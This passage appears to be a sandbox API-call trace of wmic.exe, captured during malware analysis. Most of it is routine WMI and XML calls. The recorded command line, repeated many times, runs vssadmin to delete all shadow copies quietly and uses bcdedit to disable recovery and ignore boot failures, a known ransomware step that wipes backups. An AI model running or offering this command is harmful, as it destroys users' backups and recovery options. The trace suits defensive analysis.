name="KEYWORD", namedItem=0xcfd70 | out: namedItem=0xcfd70*=0x678c98) returned 0x0 [0169.456] IXMLDOMNode:get_nodeValue (in: This=0x678c98, value=0xcfd1c | out: value=0xcfd1c*(varType=0x8, wReserved1=0x47, wReserved2=0x2cb0, wReserved3=0x47, varVal1="htable-sortby.xsl", varVal2=0x0)) returned 0x0 [0169.457] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0169.457] SysStringLen (param_1="TABLE") returned 0x5 [0169.457] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0169.457] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0169.457] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0169.457] SysStringLen (param_1="XML") returned 0x3 [0169.457] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0169.457] SysStringLen (param_1="texttablewsys") returned 0xd [0169.457] SysStringLen (param_1="XML") returned 0x3 [0169.457] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0169.457] IUnknown:Release (This=0x674b20) returned 0x0 [0169.457] IUnknown:Release (This=0x678cf8) returned 0x0 [0169.457] IUnknown:Release (This=0x678c98) returned 0x0 [0169.457] IXMLDOMNodeList:get_item (in: This=0x678e80, index=16, listItem=0xcfd78 | out: listItem=0xcfd78*=0x674b20) returned 0x0 [0169.458] IXMLDOMNode:get_text (in: This=0x674b20, text=0xcfd80 | out: text=0xcfd80*="htable.xsl") returned 0x0 [0169.458] IXMLDOMNode:get_attributes (in: This=0x674b20, attributeMap=0xcfd74 | out: attributeMap=0xcfd74*=0x678cf8) returned 0x0 [0169.458] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x678cf8, name="KEYWORD", namedItem=0xcfd70 | out: namedItem=0xcfd70*=0x678c98) returned 0x0 [0169.458] IXMLDOMNode:get_nodeValue (in: This=0x678c98, value=0xcfd1c | out: value=0xcfd1c*(varType=0x8, wReserved1=0x47, wReserved2=0x2cb0, wReserved3=0x47, varVal1="htable-sortby", varVal2=0x0)) returned 0x0 [0169.458] SysStringLen (param_1="htable-sortby") returned 0xd [0169.458] SysStringLen (param_1="TABLE") returned 0x5 [0169.458] SysStringLen 
(param_1="htable-sortby") returned 0xd [0169.552] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0169.552] SysStringLen (param_1="htable-sortby") returned 0xd [0169.552] SysStringLen (param_1="XML") returned 0x3 [0169.552] SysStringLen (param_1="htable-sortby") returned 0xd [0169.552] SysStringLen (param_1="texttablewsys") returned 0xd [0169.552] SysStringLen (param_1="htable-sortby") returned 0xd [0169.552] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0169.552] SysStringLen (param_1="XML") returned 0x3 [0169.552] SysStringLen (param_1="htable-sortby") returned 0xd [0169.552] IUnknown:Release (This=0x674b20) returned 0x0 [0169.552] IUnknown:Release (This=0x678cf8) returned 0x0 [0169.552] IUnknown:Release (This=0x678c98) returned 0x0 [0169.552] IXMLDOMNodeList:get_item (in: This=0x678e80, index=17, listItem=0xcfd78 | out: listItem=0xcfd78*=0x674b20) returned 0x0 [0169.553] IXMLDOMNode:get_text (in: This=0x674b20, text=0xcfd80 | out: text=0xcfd80*="mof.xsl") returned 0x0 [0169.553] IXMLDOMNode:get_attributes (in: This=0x674b20, attributeMap=0xcfd74 | out: attributeMap=0xcfd74*=0x678cf8) returned 0x0 [0169.553] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x678cf8, name="KEYWORD", namedItem=0xcfd70 | out: namedItem=0xcfd70*=0x678c98) returned 0x0 [0169.553] IXMLDOMNode:get_nodeValue (in: This=0x678c98, value=0xcfd1c | out: value=0xcfd1c*(varType=0x8, wReserved1=0x47, wReserved2=0x2cb0, wReserved3=0x47, varVal1="wmiclimofformat.xsl", varVal2=0x0)) returned 0x0 [0169.553] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0169.553] SysStringLen (param_1="TABLE") returned 0x5 [0169.553] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0169.553] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0169.553] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0169.553] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0169.554] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0169.554] 
SysStringLen (param_1="wmiclitableformat") returned 0x11 [0169.554] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0169.554] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0169.554] IUnknown:Release (This=0x674b20) returned 0x0 [0169.554] IUnknown:Release (This=0x678cf8) returned 0x0 [0169.554] IUnknown:Release (This=0x678c98) returned 0x0 [0169.554] IXMLDOMNodeList:get_item (in: This=0x678e80, index=18, listItem=0xcfd78 | out: listItem=0xcfd78*=0x674b20) returned 0x0 [0169.554] IXMLDOMNode:get_text (in: This=0x674b20, text=0xcfd80 | out: text=0xcfd80*="mof.xsl") returned 0x0 [0169.554] IXMLDOMNode:get_attributes (in: This=0x674b20, attributeMap=0xcfd74 | out: attributeMap=0xcfd74*=0x678cf8) returned 0x0 [0169.554] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x678cf8, name="KEYWORD", namedItem=0xcfd70 | out: namedItem=0xcfd70*=0x678c98) returned 0x0 [0169.555] IXMLDOMNode:get_nodeValue (in: This=0x678c98, value=0xcfd1c | out: value=0xcfd1c*(varType=0x8, wReserved1=0x47, wReserved2=0x2cb0, wReserved3=0x47, varVal1="wmiclimofformat", varVal2=0x0)) returned 0x0 [0169.555] SysStringLen (param_1="wmiclimofformat") returned 0xf [0169.555] SysStringLen (param_1="TABLE") returned 0x5 [0169.555] SysStringLen (param_1="wmiclimofformat") returned 0xf [0169.555] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0169.555] SysStringLen (param_1="wmiclimofformat") returned 0xf [0169.555] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0169.555] SysStringLen (param_1="wmiclimofformat") returned 0xf [0169.555] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0169.555] SysStringLen (param_1="wmiclimofformat") returned 0xf [0169.555] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0169.555] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0169.555] SysStringLen (param_1="wmiclimofformat") returned 0xf [0169.556] IUnknown:Release (This=0x674b20) returned 0x0 [0169.556] IUnknown:Release (This=0x678cf8) returned 
0x0 [0169.556] IUnknown:Release (This=0x678c98) returned 0x0 [0169.556] IXMLDOMNodeList:get_item (in: This=0x678e80, index=19, listItem=0xcfd78 | out: listItem=0xcfd78*=0x674b20) returned 0x0 [0169.556] IXMLDOMNode:get_text (in: This=0x674b20, text=0xcfd80 | out: text=0xcfd80*="textvaluelist.xsl") returned 0x0 [0169.556] IXMLDOMNode:get_attributes (in: This=0x674b20, attributeMap=0xcfd74 | out: attributeMap=0xcfd74*=0x678cf8) returned 0x0 [0169.556] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x678cf8, name="KEYWORD", namedItem=0xcfd70 | out: namedItem=0xcfd70*=0x678c98) returned 0x0 [0169.556] IXMLDOMNode:get_nodeValue (in: This=0x678c98, value=0xcfd1c | out: value=0xcfd1c*(varType=0x8, wReserved1=0x47, wReserved2=0x2cb0, wReserved3=0x47, varVal1="wmiclivalueformat.xsl", varVal2=0x0)) returned 0x0 [0169.557] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0169.557] SysStringLen (param_1="TABLE") returned 0x5 [0169.557] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0169.557] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0169.557] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0169.557] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0169.557] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0169.557] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0169.557] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0169.557] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0169.557] IUnknown:Release (This=0x674b20) returned 0x0 [0169.557] IUnknown:Release (This=0x678cf8) returned 0x0 [0169.557] IUnknown:Release (This=0x678c98) returned 0x0 [0169.557] IXMLDOMNodeList:get_item (in: This=0x678e80, index=20, listItem=0xcfd78 | out: listItem=0xcfd78*=0x674b20) returned 0x0 [0169.558] IXMLDOMNode:get_text (in: This=0x674b20, text=0xcfd80 | out: text=0xcfd80*="textvaluelist.xsl") returned 0x0 [0169.558] IXMLDOMNode:get_attributes (in: This=0x674b20, 
attributeMap=0xcfd74 | out: attributeMap=0xcfd74*=0x678cf8) returned 0x0 [0169.558] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x678cf8, name="KEYWORD", namedItem=0xcfd70 | out: namedItem=0xcfd70*=0x678c98) returned 0x0 [0169.558] IXMLDOMNode:get_nodeValue (in: This=0x678c98, value=0xcfd1c | out: value=0xcfd1c*(varType=0x8, wReserved1=0x47, wReserved2=0x2cb0, wReserved3=0x47, varVal1="wmiclivalueformat", varVal2=0x0)) returned 0x0 [0169.558] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0169.558] SysStringLen (param_1="TABLE") returned 0x5 [0169.558] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0169.558] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0169.558] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0169.558] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0169.558] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0169.558] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0169.558] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0169.558] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0169.559] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0169.559] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0169.559] IUnknown:Release (This=0x674b20) returned 0x0 [0169.559] IUnknown:Release (This=0x678cf8) returned 0x0 [0169.559] IUnknown:Release (This=0x678c98) returned 0x0 [0169.559] IUnknown:Release (This=0x678e80) returned 0x0 [0169.559] FreeThreadedDOMDocument:IUnknown:Release (This=0x678c58) returned 0x1 [0169.559] FreeThreadedDOMDocument:IUnknown:Release (This=0x674630) returned 0x0 [0169.559] GetCommandLineW () returned="wmic.exe process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"" [0169.559] memcpy_s (in: _Destination=0x47ee58, _DestinationSize=0x18e, _Source=0x1f1674, _SourceSize=0x184 
| out: _Destination=0x47ee58) returned 0x0 [0169.560] GetLocalTime (in: lpSystemTime=0xcfd28 | out: lpSystemTime=0xcfd28*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xb, wMilliseconds=0x194)) [0169.560] _vsnwprintf (in: _Buffer=0x7605b0, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0xcfd08 | out: _Buffer="08-30-2018T19:37:11") returned 19 [0169.560] lstrlenW (lpString=" process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"") returned 186 [0169.560] lstrlenW (lpString=" process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"") returned 186 [0169.560] lstrlenW (lpString=" process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"") returned 186 [0169.560] lstrlenW (lpString=" process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"") returned 186 [0169.560] lstrlenW (lpString=" process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"") returned 186 [0169.560] lstrlenW (lpString=" process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"") returned 186 [0169.560] lstrlenW (lpString="process") returned 7 [0169.560] _wcsicmp (_String1="process", _String2="\"NULL\"") returned 78 [0169.560] lstrlenW (lpString=" process call create \"cmd.exe 
/c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"") returned 186 [0169.560] lstrlenW (lpString="call") returned 4 [0169.560] _wcsicmp (_String1="call", _String2="\"NULL\"") returned 65 [0169.560] memmove_s (in: _Destination=0x472f00, _DestinationSize=0x4, _Source=0x472cc8, _SourceSize=0x4 | out: _Destination=0x472f00) returned 0x0 [0169.561] lstrlenW (lpString=" process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"") returned 186 [0169.561] lstrlenW (lpString="create") returned 6 [0169.561] _wcsicmp (_String1="create", _String2="\"NULL\"") returned 65 [0169.561] memmove_s (in: _Destination=0x47f080, _DestinationSize=0x8, _Source=0x472f00, _SourceSize=0x8 | out: _Destination=0x47f080) returned 0x0 [0169.561] lstrlenW (lpString=" process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"") returned 186 [0169.561] lstrlenW (lpString="\"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"") returned 164 [0169.561] _wcsicmp (_String1="\"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"", _String2="\"NULL\"") returned -11 [0169.561] lstrlenW (lpString="\"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"") returned 164 [0169.561] lstrlenW (lpString="\"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set 
{default} bootstatuspolicy ignoreallfailures\"") returned 164 [0169.561] memmove_s (in: _Destination=0x47f020, _DestinationSize=0xc, _Source=0x47f080, _SourceSize=0xc | out: _Destination=0x47f020) returned 0x0 [0169.561] lstrlenW (lpString="QUIT") returned 4 [0169.561] lstrlenW (lpString="process") returned 7 [0169.561] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="process", cchCount1=7, lpString2="QUIT", cchCount2=4) returned 1 [0169.561] lstrlenW (lpString="EXIT") returned 4 [0169.562] lstrlenW (lpString="process") returned 7 [0169.562] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="process", cchCount1=7, lpString2="EXIT", cchCount2=4) returned 3 [0169.562] WbemLocator:IUnknown:AddRef (This=0x720828) returned 0x2 [0169.562] lstrlenW (lpString="/") returned 1 [0169.562] lstrlenW (lpString="process") returned 7 [0169.562] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="process", cchCount1=7, lpString2="/", cchCount2=1) returned 3 [0169.562] lstrlenW (lpString="-") returned 1 [0169.562] lstrlenW (lpString="process") returned 7 [0169.562] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="process", cchCount1=7, lpString2="-", cchCount2=1) returned 3 [0169.562] lstrlenW (lpString="CLASS") returned 5 [0169.562] lstrlenW (lpString="process") returned 7 [0169.562] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="process", cchCount1=7, lpString2="CLASS", cchCount2=5) returned 3 [0169.562] lstrlenW (lpString="PATH") returned 4 [0169.562] lstrlenW (lpString="process") returned 7 [0169.562] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="process", cchCount1=7, lpString2="PATH", cchCount2=4) returned 3 [0169.562] lstrlenW (lpString="CONTEXT") returned 7 [0169.562] lstrlenW (lpString="process") returned 7 [0169.562] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="process", cchCount1=7, lpString2="CONTEXT", cchCount2=7) returned 3 [0169.562] lstrlenW (lpString="process") returned 7 
[0169.563] lstrlenW (lpString="process") returned 7 [0169.563] GetCurrentThreadId () returned 0xf7c [0169.563] ??0CHString@@QAE@XZ () returned 0xcfc7c [0169.563] WbemLocator:IWbemLocator:ConnectServer (in: This=0x720828, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x8bc1e0 | out: ppNamespace=0x8bc1e0*=0x72c74c) returned 0x0 [0172.174] CoSetProxyBlanket (pProxy=0x72c74c, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0172.174] ??1CHString@@QAE@XZ () returned 0x6f950504 [0172.174] GetCurrentThreadId () returned 0xf7c [0172.174] ??0CHString@@QAE@XZ () returned 0xcfc14 [0172.174] SysStringLen (param_1="root\\cli") returned 0x8 [0172.174] SysStringLen (param_1="\\") returned 0x1 [0172.174] SysStringLen (param_1="root\\cli\\") returned 0x9 [0172.174] SysStringLen (param_1="ms_409") returned 0x6 [0172.175] WbemLocator:IWbemLocator:ConnectServer (in: This=0x720828, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x8bc1e4 | out: ppNamespace=0x8bc1e4*=0x72c7cc) returned 0x0 [0172.554] ??1CHString@@QAE@XZ () returned 0x6f950504 [0172.554] GetCurrentThreadId () returned 0xf7c [0172.554] ??0CHString@@QAE@XZ () returned 0xcfc80 [0172.554] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0172.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x871f7c, cbMultiByte=-1, lpWideCharStr=0x472f00, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0172.554] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0172.554] SysStringLen (param_1="process") returned 0x7 [0172.555] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='process") returned 0x23 [0172.555] SysStringLen (param_1="'") returned 0x1 [0172.555] 
IWbemServices:GetObject (in: This=0x72c74c, strObjectPath="MSFT_CliAlias.FriendlyName='process'", lFlags=0, pCtx=0x0, ppObject=0xcfc7c*=0x0, ppCallResult=0x0 | out: ppObject=0xcfc7c*=0x74fff8, ppCallResult=0x0) returned 0x0 [0172.574] IWbemClassObject:Get (in: This=0x74fff8, wszName="Target", lFlags=0, pVal=0xcfc3c*(varType=0x0, wReserved1=0xc, wReserved2=0xe58c, wReserved3=0x8a, varVal1=0xffffffff, varVal2=0x87a03c), pType=0x0, plFlavor=0x0 | out: pVal=0xcfc3c*(varType=0x8, wReserved1=0xc, wReserved2=0xe58c, wReserved3=0x8a, varVal1="Select * from Win32_Process", varVal2=0x87a03c), pType=0x0, plFlavor=0x0) returned 0x0 [0172.575] lstrlenW (lpString="Select * from Win32_Process") returned 27 [0172.575] lstrlenW (lpString="Select * from Win32_Process") returned 27 [0172.575] IWbemClassObject:Get (in: This=0x74fff8, wszName="PWhere", lFlags=0, pVal=0xcfc3c*(varType=0x0, wReserved1=0xc, wReserved2=0xe58c, wReserved3=0x8a, varVal1=0x24b014, varVal2=0x87a03c), pType=0x0, plFlavor=0x0 | out: pVal=0xcfc3c*(varType=0x8, wReserved1=0xc, wReserved2=0xe58c, wReserved3=0x8a, varVal1="WHERE ProcessId='#'", varVal2=0x87a03c), pType=0x0, plFlavor=0x0) returned 0x0 [0172.575] lstrlenW (lpString="WHERE ProcessId='#'") returned 19 [0172.575] lstrlenW (lpString="WHERE ProcessId='#'") returned 19 [0172.575] IWbemClassObject:Get (in: This=0x74fff8, wszName="Connection", lFlags=0, pVal=0xcfc3c*(varType=0x0, wReserved1=0xc, wReserved2=0xe58c, wReserved3=0x8a, varVal1=0x24972c, varVal2=0x87a03c), pType=0x0, plFlavor=0x0 | out: pVal=0xcfc3c*(varType=0xd, wReserved1=0xc, wReserved2=0xe58c, wReserved3=0x8a, varVal1=0x7503b8, varVal2=0x87a03c), pType=0x0, plFlavor=0x0) returned 0x0 [0172.575] IUnknown:QueryInterface (in: This=0x7503b8, riid=0x876b50*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0xcfc74 | out: ppvObject=0xcfc74*=0x7503b8) returned 0x0 [0172.575] GetCurrentThreadId () returned 
0xf7c [0172.575] ??0CHString@@QAE@XZ () returned 0xcfbf0 [0172.575] IWbemClassObject:Get (in: This=0x7503b8, wszName="Namespace", lFlags=0, pVal=0xcfbc0*(varType=0x0, wReserved1=0x0, wReserved2=0xf110, wReserved3=0x47, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcfbc0*(varType=0x8, wReserved1=0x0, wReserved2=0xf110, wReserved3=0x47, varVal1="ROOT\\CIMV2", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.576] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0172.576] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0172.576] IWbemClassObject:Get (in: This=0x7503b8, wszName="Locale", lFlags=0, pVal=0xcfbc0*(varType=0x0, wReserved1=0x0, wReserved2=0xf110, wReserved3=0x47, varVal1=0x25cf0c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcfbc0*(varType=0x8, wReserved1=0x0, wReserved2=0xf110, wReserved3=0x47, varVal1="ms_409", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.576] lstrlenW (lpString="ms_409") returned 6 [0172.576] lstrlenW (lpString="ms_409") returned 6 [0172.576] IWbemClassObject:Get (in: This=0x7503b8, wszName="User", lFlags=0, pVal=0xcfbc0*(varType=0x0, wReserved1=0x0, wReserved2=0xf110, wReserved3=0x47, varVal1=0x25cf0c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcfbc0*(varType=0x1, wReserved1=0x0, wReserved2=0xf110, wReserved3=0x47, varVal1=0x25cf0c, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.576] IWbemClassObject:Get (in: This=0x7503b8, wszName="Password", lFlags=0, pVal=0xcfbc0*(varType=0x1, wReserved1=0x0, wReserved2=0xf110, wReserved3=0x47, varVal1=0x25cf0c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcfbc0*(varType=0x1, wReserved1=0x0, wReserved2=0xf110, wReserved3=0x47, varVal1=0x25cf0c, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.576] IWbemClassObject:Get (in: This=0x7503b8, wszName="Server", lFlags=0, pVal=0xcfbc0*(varType=0x1, wReserved1=0x0, wReserved2=0xf110, wReserved3=0x47, varVal1=0x25cf0c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: 
pVal=0xcfbc0*(varType=0x8, wReserved1=0x0, wReserved2=0xf110, wReserved3=0x47, varVal1=".", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.576] lstrlenW (lpString=".") returned 1 [0172.576] lstrlenW (lpString=".") returned 1 [0172.576] IWbemClassObject:Get (in: This=0x7503b8, wszName="Authority", lFlags=0, pVal=0xcfbc0*(varType=0x0, wReserved1=0x0, wReserved2=0xf110, wReserved3=0x47, varVal1=0x25cf0c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcfbc0*(varType=0x1, wReserved1=0x0, wReserved2=0xf110, wReserved3=0x47, varVal1=0x25cf0c, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.577] ??1CHString@@QAE@XZ () returned 0x6f950504 [0172.577] IUnknown:Release (This=0x7503b8) returned 0x1 [0172.577] GetCurrentThreadId () returned 0xf7c [0172.577] ??0CHString@@QAE@XZ () returned 0xcfbe8 [0172.577] IWbemClassObject:Get (in: This=0x74fff8, wszName="__RELPATH", lFlags=0, pVal=0xcfbc8*(varType=0x0, wReserved1=0x6f7d, wReserved2=0x0, wReserved3=0x72, varVal1=0x0, varVal2=0x7503b8), pType=0x0, plFlavor=0x0 | out: pVal=0xcfbc8*(varType=0x8, wReserved1=0x6f7d, wReserved2=0x0, wReserved3=0x72, varVal1="MSFT_CliAlias.FriendlyName=\"Process\"", varVal2=0x7503b8), pType=0x0, plFlavor=0x0) returned 0x0 [0172.577] GetCurrentThreadId () returned 0xf7c [0172.577] ??0CHString@@QAE@XZ () returned 0xcfb78 [0172.577] ??0CHString@@QAE@PBG@Z () returned 0xcfb64 [0172.577] ??0CHString@@QAE@ABV0@@Z () returned 0xcfb04 [0172.577] ?Empty@CHString@@QAEXXZ () returned 0x6f950510 [0172.577] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x472f70 [0172.577] ?Find@CHString@@QBEHPBG@Z () returned 0x1b [0172.577] ?Left@CHString@@QBE?AV1@H@Z () returned 0xcfae4 [0172.577] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0xcfae8 [0172.577] ??YCHString@@QAEABV0@ABV0@@Z () returned 0xcfb64 [0172.577] ??1CHString@@QAE@XZ () returned 0x1 [0172.577] ??1CHString@@QAE@XZ () returned 0x1 [0172.577] ?Mid@CHString@@QBE?AV1@H@Z () returned 0xcfae0 [0172.577] ??4CHString@@QAEABV0@ABV0@@Z 
() returned 0xcfb04 [0172.577] ??1CHString@@QAE@XZ () returned 0x1 [0172.577] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x472fd0 [0172.577] ?Find@CHString@@QBEHPBG@Z () returned 0x7 [0172.577] ?Left@CHString@@QBE?AV1@H@Z () returned 0xcfae4 [0172.577] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0xcfae8 [0172.577] ??YCHString@@QAEABV0@ABV0@@Z () returned 0xcfb64 [0172.578] ??1CHString@@QAE@XZ () returned 0x1 [0172.578] ??1CHString@@QAE@XZ () returned 0x1 [0172.578] ?Mid@CHString@@QBE?AV1@H@Z () returned 0xcfae0 [0172.578] ??4CHString@@QAEABV0@ABV0@@Z () returned 0xcfb04 [0172.578] ??1CHString@@QAE@XZ () returned 0x6f950504 [0172.578] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x6f950504 [0172.578] ??1CHString@@QAE@XZ () returned 0x6f950504 [0172.578] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0172.578] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0172.578] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0172.578] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"Process\\\"") returned 0x26 [0172.578] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Process\\\"") returned 0x79 [0172.578] SysStringLen (param_1="\"") returned 0x1 [0172.579] IWbemServices:GetObject (in: This=0x72c7cc, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Process\\\"\"", lFlags=0, pCtx=0x0, ppObject=0xcfb80*=0x0, ppCallResult=0x0 | out: ppObject=0xcfb80*=0x750440, ppCallResult=0x0) returned 0x0 [0172.582] IWbemClassObject:Get (in: This=0x750440, wszName="Text", lFlags=0, pVal=0xcfb2c*(varType=0x0, wReserved1=0x21, wReserved2=0x44cc, wReserved3=0x21, varVal1=0x48, varVal2=0x8bc1e0), pType=0x0, plFlavor=0x0 | out: 
